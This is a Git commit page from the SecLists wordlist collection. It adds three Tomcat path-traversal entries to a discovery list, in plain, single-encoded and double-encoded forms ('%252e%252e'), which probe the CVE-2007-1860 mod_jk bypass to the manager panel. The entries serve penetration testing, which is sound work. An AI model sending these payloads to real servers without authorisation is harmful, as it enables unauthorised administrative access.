idan/SecLists
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

Support for CVE-2007-1860 mod_jk double encoding

Browse Source 
Added paths that will check access control bypass using double encoding (CVE-2007-1860) that could allow a remote user to access Tomcat's administration panel.
Based on the scenario demonstrated on https://pentesterlab.com/exercises/cve-2007-1860/course
This commit is contained in:
Tiago Sintra
2016-07-28 14:10:42 +02:00
committed by GitHub
parent c8741490de
commit fff5faa976
1 changed files with 3 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

3
Discovery/Web_Content/tomcat.txt
View File

@@ -21,6 +21,9 @@ examples/servlet/org.apache.catalina.servlets.WebdavServlet/jsp/snp/snoop.jsp
examples/servlet/org.apache.catalina.servlets.WebdavServlet/jsp/source.jsp examples/servlet/org.apache.catalina.servlets.WebdavServlet/jsp/source.jsp
examples/servlet/snoop examples/servlet/snoop
examples/servlets/index.html examples/servlets/index.html
examples/../manager/html
examples/%2e%2e/manager/html
examples/%252e%252e/manager/html
host-manager host-manager
host-manager/add host-manager/add
host-manager/host-manager.xml host-manager/host-manager.xml